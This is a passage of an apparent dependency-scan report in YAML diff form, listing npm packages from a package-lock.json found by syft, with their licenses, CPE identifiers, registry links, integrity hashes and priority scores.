+ name: https-proxy-agent + version: 7.0.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/https-proxy-agent@7.0.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz + integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw== + dependencies: + agent-base: ^7.1.2 + debug: '4' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eedb1c984540056e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: hyphen 1.14.1' + title: hyphen 1.14.1 + description: 'Package discovered: hyphen 1.14.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0cfa30ecdd760351 + name: hyphen + version: 1.14.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/hyphen@1.14.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz + integrity: sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 233f854a4d966408 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: iconv-lite 0.4.24' + title: iconv-lite 0.4.24 + description: 'Package discovered: iconv-lite 0.4.24' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3ce09826a837d25b + name: iconv-lite + version: 0.4.24 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/iconv-lite@0.4.24 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz + integrity: sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA== + dependencies: + safer-buffer: '>= 2.1.2 < 3' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a2d6f15d605131f9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: inherits 2.0.4' + title: inherits 2.0.4 + description: 'Package discovered: inherits 2.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 911374ff7f37ba7f + name: inherits + version: 2.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/inherits@2.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz + integrity: sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6970e7e10ca27673 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ini 1.3.8' + title: ini 1.3.8 + description: 'Package discovered: ini 1.3.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 29aeb86d59c0f085 + name: ini + version: 1.3.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ini@1.3.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ini/-/ini-1.3.8.tgz + integrity: sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9c64ace1b439e4fe + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: internmap 2.0.3' + title: internmap 2.0.3 + description: 'Package discovered: internmap 2.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: da7b570ddddf2064 + name: internmap + version: 2.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/internmap@2.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz + integrity: sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f4c9c2133d427419 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ioredis 5.10.1' + title: ioredis 5.10.1 + description: 'Package discovered: ioredis 5.10.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0c5e141c3ee662a0 + name: ioredis + version: 5.10.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ioredis@5.10.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz + integrity: sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA== + dependencies: + '@ioredis/commands': 1.5.1 + cluster-key-slot: ^1.1.0 + debug: ^4.3.4 + denque: ^2.1.0 + lodash.defaults: ^4.2.0 + lodash.isarguments: ^3.1.0 + redis-errors: ^1.2.0 + redis-parser: ^3.0.0 + standard-as-callback: ^2.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: af1cc3d21ce4d415 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ip-address 10.2.0' + title: ip-address 10.2.0 + description: 'Package discovered: ip-address 10.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 25abf70855373b85 + name: ip-address + version: 10.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ip-address@10.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz + integrity: sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5ea31e6ac67f4d75 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ipaddr.js 1.9.1' + title: ipaddr.js 1.9.1 + description: 'Package discovered: ipaddr.js 1.9.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c7a7f0ed243b0857 + name: ipaddr.js + version: 1.9.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ipaddr.js@1.9.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz + integrity: sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fae14e02f5662aa3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-arrayish 0.3.4' + title: is-arrayish 0.3.4 + description: 'Package discovered: is-arrayish 0.3.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 88ac3450fc3712b8 + name: is-arrayish + version: 0.3.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-arrayish@0.3.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz + integrity: sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f590fee2d4fea15c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-binary-path 2.1.0' + title: is-binary-path 2.1.0 + description: 'Package discovered: is-binary-path 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 12d3bfff6ef69b2c + name: is-binary-path + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-binary-path@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz + integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw== + dependencies: + binary-extensions: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3e8a78c5009c1819 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-core-module 2.16.1' + title: is-core-module 2.16.1 + description: 'Package discovered: is-core-module 2.16.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9f592f96ab7392ec + name: is-core-module + version: 2.16.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-core-module@2.16.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz + integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w== + dependencies: + hasown: ^2.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bb2d7c3406b84981 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-extglob 2.1.1' + title: is-extglob 2.1.1 + description: 'Package discovered: is-extglob 2.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b2879743f62f2c47 + name: is-extglob + version: 2.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-extglob@2.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz + integrity: sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 437e0c6e090c00f1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-fullwidth-code-point 3.0.0' + title: is-fullwidth-code-point 3.0.0 + description: 'Package discovered: is-fullwidth-code-point 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8a7d27e13373f9f8 + name: is-fullwidth-code-point + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-fullwidth-code-point@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz + integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8b982d6ae21c367b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: is-glob 4.0.3' + title: is-glob 4.0.3 + description: 'Package discovered: is-glob 4.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6a2e0a343ed2b45b + name: is-glob + version: 4.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/is-glob@4.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz + integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg== + dependencies: + is-extglob: ^2.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 